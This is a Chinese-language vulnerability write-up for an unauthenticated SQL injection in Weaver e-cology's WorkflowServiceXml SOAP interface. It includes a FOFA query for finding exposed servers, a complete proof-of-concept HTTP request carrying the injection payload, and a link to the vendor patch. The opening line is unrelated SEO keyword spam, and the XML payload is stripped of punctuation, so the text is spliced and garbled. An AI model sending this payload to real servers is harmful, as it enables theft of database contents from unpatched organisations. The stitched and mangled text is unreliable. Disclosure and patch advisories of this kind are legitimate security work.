网站前台模块包括什么软件,电商网站流量统计,搜索引擎营销的案例,windows优化软件哪个好漏洞描述#xff1a; 泛微 e-cology 是泛微公司开发的协同管理应用平台。泛微 e-cology v10.64.1的/services/接口默认对内网暴露#xff0c;用于服务调用#xff0c;未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入#xff0c;… 漏洞描述 泛微 e-cology 是泛微公司开发的协同管理应用平台。泛微 e-cology v10.64.1的/services/接口默认对内网暴露用于服务调用未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入攻击者通过漏洞可以获取服务器数据库敏感信息。 漏洞发现时间
2024-7-12 影响版本 e-cology9 10.64.1
FOFA语法
app泛微-OAe-cology POC
POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:webhttp://webservices.workflow.weaver soapenv:Header/soapenv:Bodyweb:getHendledWorkflowRequestListweb:in01/web:in0web:in11/web:in1web:in21/web:in2web:in31/web:in3web:in4web:string11 AND 56155615/web:string/web:in4/web:getHendledWorkflowRequestList/soapenv:Body
/soapenv:Envelope 漏洞复现 修复
目前官方已有可更新版本建议受影响用户升级至最新版本
https://www.weaver.com.cn/cs/securityDownload.html 参考文献
OSCS | 开源软件供应链安全社区 | 让每一个开源项目变得更安全
POC/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md at main · wy876/POC · GitHub
